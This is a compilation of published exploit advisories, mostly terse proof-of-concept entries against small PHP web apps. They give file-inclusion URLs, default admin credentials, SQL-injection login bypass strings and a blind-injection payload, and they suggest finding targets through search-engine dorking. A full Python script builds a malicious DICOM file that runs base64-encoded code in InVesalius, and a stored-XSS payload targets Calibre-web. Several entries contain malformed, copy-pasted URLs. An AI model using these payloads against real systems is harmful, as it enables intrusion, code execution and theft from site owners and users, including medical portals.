<pre><code>====================================================================================================================================<br />| # Title : miniProxy 1.0.0 File inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://github.com/joshdick/miniProxy |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /miniProxy_orig.php?commit=%ef%80%82&miniProxyFormAction=http://testasp.vulnweb.com/t/fit.txt%3F.org/privacy/tos&previous_text=&search_text=<br /><br />[+] https://www/127.0.0.1/miniProxy/miniProxy_orig.php?commit=%ef%80%82&miniProxyFormAction=http://testasp.vulnweb.com/t/fit.txt%3F.org/privacy/tos&previous_text=&search_text=<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Medicine Tracker System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Medical Hub Directory Site v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Medical Center Portal 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : USer&pass = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/medic/pages/index.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Marc@TMS cms v1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : http://www.web.cpzgroup.com/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : Prodotto.php?id=1202<br /><br />[+] https://www/127.0.0.1/demo/storeitalyit/modules_cms/Prodotto.php?id=1202 <=== inject here<br /><br /><br />[+] ---<br /> Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=1202 AND 5978=5978<br /> ---<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : LRMS v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Login System Project 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user = ' or 0=0 ## & pass = 'or''='<br /><br />[+] http://127.0.0.1/loginsystem/admin/dashboard.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Loan Management System 1.0 File inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] USe Payload : /loan/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />[+] http://127.0.0.1//loan/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code># Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)<br /># Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)<br /># Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)<br /># Vendor Homepage: https://invesalius.github.io/<br /># Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius<br /># Version: 3.1.99991 to 3.1.99998<br /># Tested on: Windows<br /># CVE-ID: CVE-2024-42845<br /># External references: https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan, https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845<br /><br />###<br /># exploit to create the malicious DICOM file<br />###<br /><br />import pydicom<br />import base64<br />import argparse<br /><br />pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE<br /><br /><br />def encode_payload(plain_payload):<br /> data = open(plain_payload, 'rb').read()<br /> return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"<br /><br />def prepare_dicom_payload(dicom_file_path, sign, payload):<br /> try:<br /> dicom_data = pydicom.dcmread(dicom_file_path)<br /> if sign:<br /> dicom_data.Manufacturer = "Malicious DICOM file creator"<br /> dicom_data.InstitutionName = "Malicious DICOM file institution"<br /><br /> values = dicom_data[0x0020, 0x0032].value<br /> mal = [str(i) for i in values]<br /> mal.append(encode_payload(payload))<br /> <br /> except pydicom.errors.InvalidDicomError:<br /> print("The file is not a valid DICOM file.")<br /> except Exception as e:<br /> print(f"An error occurred: {e}")<br /> <br /> return mal<br /><br /><br />def modify_dicom_field(dicom_file_path, malicious_tag, outfile):<br /> try:<br /> dicom_dataset = pydicom.dcmread(dicom_file_path)<br /> elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)<br /> dicom_dataset[0x00200032] = elem<br /> print(dicom_dataset)<br /> dicom_dataset.save_as(outfile)<br /> except Exception as e:<br /> print(f"An error occurred: {e}")<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Read a DICOM file.')<br /> parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')<br /> parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')<br /> parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')<br /> parser.add_argument('--signature', required=False, default=True)<br /> <br /> args = parser.parse_args()<br /> dicom_infile_path = args.dicom<br /> dicom_outfile_path = args.outfile<br /> <br /> tmp_tag = prepare_dicom_payload(dicom_infile_path, sign=args.signature, payload=args.payload)<br /> if tmp_tag:<br /> malicious_tag = '\\'.join(tmp_tag)<br /><br /> modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path)<br /> exit(0)<br /> else:<br /> exit(1)<br /></code></pre>
<pre><code># Exploit Title: Stored XSS in Calibre-web<br /># Date: 07/05/2024<br /># Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache)<br /># Vendor Homepage: (https://github.com/janeczku/calibre-web/)<br /># Version: 0.6.21 - Romesa<br /># Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4<br /># CVE: CVE-2024-39123<br /><br />## Vulnerability Description<br />Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.<br /><br />## Steps to Reproduce<br />1. Log in to the application.<br />2. Upload a new book.<br />3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint.<br />4. In the `Comments` field, input the following payload:<br /><br /> <a href=javas%1Bcript:alert()>Hello there!</a><br /><br />4. Save the changes.<br />5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.<br /> <br /><br /></code></pre>
